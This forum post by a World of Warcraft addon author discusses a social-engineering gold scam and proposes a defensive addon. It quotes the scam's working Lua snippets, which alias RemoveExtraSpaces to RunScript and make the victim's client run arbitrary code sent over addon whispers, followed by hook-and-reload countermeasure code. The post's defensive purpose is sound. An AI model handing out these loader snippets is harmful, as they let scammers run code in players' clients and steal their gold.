Thread: AcceptTrade gold scamming, catching hardware events
View Single Post
07-13-16, 11:38 PM   #1
Ketho
A Pyroguard Emberseer
 
Ketho's Avatar
AddOn Author - Click to view addons
Join Date: Mar 2010
Posts: 1,026
AcceptTrade gold scamming, catching hardware events
There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible counter measures:
  • Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
    Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
  • Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110


Lua Code:
  1. local addonName = ...
  2. local f = CreateFrame("Frame")
  3. local db
  4.  
  5. local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
  6. local msg_warn = msg..".\n\nClick anywhere to /reload."
  7. local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
  8.  
  9. StaticPopupDialogs.SAFETRADE_WARNING = {
  10.     text = "%s",
  11.     button1 = OKAY,
  12.     exclusive = 1, whileDead = 1, showAlert = 1,
  13. }
  14.  
  15. function f:OnEvent(event, addon)
  16.     if addon == addonName then
  17.         SafeTradeDB = SafeTradeDB or {}
  18.         db = SafeTradeDB -- init savedvars
  19.         if db.warning then
  20.             StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
  21.             db.warning = nil
  22.         end
  23.         self:SetHook("RunScript")
  24.     
  25.     elseif addon == "Blizzard_DebugTools" then
  26.         self:SetHook("DevTools_DumpCommand")
  27.     end
  28. end
  29.  
  30. function f:SetHook(func)
  31.     hooksecurefunc(func, function()
  32.         if _G[func] == RemoveExtraSpaces then
  33.             -- reload asap, they cant be that fast ... right?
  34.             db.warning = "RemoveExtraSpaces"
  35.             StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
  36.             self:CatchHW()
  37.         end
  38.     end)
  39. end
  40.  
  41. local btn
  42.  
  43. function f:CatchHW()
  44.     if not btn then
  45.         btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
  46.         btn:SetAllPoints(UIParent)
  47.         btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
  48.         btn:SetAttribute("macrotext", "/reload")
  49.         --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
  50.         
  51.         btn:SetFrameStrata("TOOLTIP")
  52.         btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
  53.     end
  54. end
  55.  
  56. f:RegisterEvent("ADDON_LOADED")
  57. f:SetScript("OnEvent", f.OnEvent)
Last edited by Ketho : 07-14-16 at 05:31 PM.
  Reply With Quote